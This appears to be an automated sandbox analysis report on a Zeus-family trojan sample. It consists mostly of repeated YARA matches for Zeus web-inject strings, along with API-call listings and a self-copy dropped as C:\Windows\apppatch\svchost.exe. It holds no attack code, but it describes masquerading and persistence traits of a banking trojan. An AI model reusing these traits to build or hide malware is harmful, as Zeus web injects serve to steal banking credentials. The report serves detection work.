Source: 2.3.svchost.exe.b00000.46.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.16.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.UMwpXhA46R.exe.7031e8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.52.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.31.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2c70000.4.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.27.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ea2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.15b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.47.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2b80000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.UMwpXhA46R.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.33.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.46.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.23.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.UMwpXhA46R.exe.407000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.42.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29f3c00.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.15.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.27a0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2cd1c00.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.55.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 33.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2672000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1040000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2af2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.42.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.24f2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.54.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2d80000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ca0000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.UMwpXhA46R.exe.406400.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.a20000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.51.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.37.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.9c2000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 30.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.25f2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2b80000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.51.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2560000.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.48.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2e82000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.UMwpXhA46R.exe.7081e8.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.f380000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.9.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.18.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.24.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1040000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11e2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.UMwpXhA46R.exe.7031e8.2.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.35.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ab2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.54.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.41.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.UMwpXhA46R.exe.708de8.0.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3c40000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.35.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.25.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886c00.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.41.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.32.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1552000.1.unpack, type: UNPACKEDPEMatched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3040000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.UMwpXhA46R.exe.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.31.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.44.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.15.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.39.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.11d2000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 9.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.9c2000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.24.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.19.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.38.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.UMwpXhA46R.exe.7081e8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29a2000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.UMwpXhA46R.exe.407000.0.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2ab2000.1.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.12.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.7.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2e82000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.1.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2d80000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.40.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2a50000.6.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.43.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.48.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.32.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2a50000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.b00000.55.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 39.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.d30000.2.unpack, type: UNPACKEDPE, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: UMwpXhA46R.exe PID: 7020, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: svchost.exe PID: 1112, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 6912, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 1220, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 2268, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3472, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 1492, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 6628, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 5128, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 2948, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3416, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3328, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 3896, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 6212, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Process Memory Space: PMnAVsjMPucERAKEWNFImySCFHoLk.exe PID: 1476, type: MEMORYSTR, Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: Yara match, File source: 2.3.svchost.exe.881000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.3.svchost.exe.881000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.UMwpXhA46R.exe.7031e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.UMwpXhA46R.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.UMwpXhA46R.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.2148607507.0000000000703000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000003.2168260986.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000003.2168388667.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: UMwpXhA46R.exe PID: 7020, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: svchost.exe PID: 1112, type: MEMORYSTR
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C76A30 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C73940 VirtualQuery,VirtualQuery,VirtualQuery,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 6_2_01243940 VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 7_2_01043940 VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 9_2_00A23940 VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Code function: 0_2_004020B0: CreateFileA,VirtualAlloc,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Code function: 0_2_004017F0 _snprintf,memset,MultiByteToWideChar,GetProcessHeap,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,GetProcessHeap,CreateProcessWithLogonW,GetProcessHeap,HeapValidate,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\UMwpXhA46R.exe File created: C:\Windows\apppatch\svchost.exe
Source: C:\Users\user\Desktop\UMwpXhA46R.exe File created: C:\Windows\apppatch\svchost.exe\:Zone.Identifier:$DATA
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 904
Source: UMwpXhA46R.exe Binary or memory string: OriginalFilenamejavacpl.exeX vs UMwpXhA46R.exe
Source: UMwpXhA46R.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3270000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
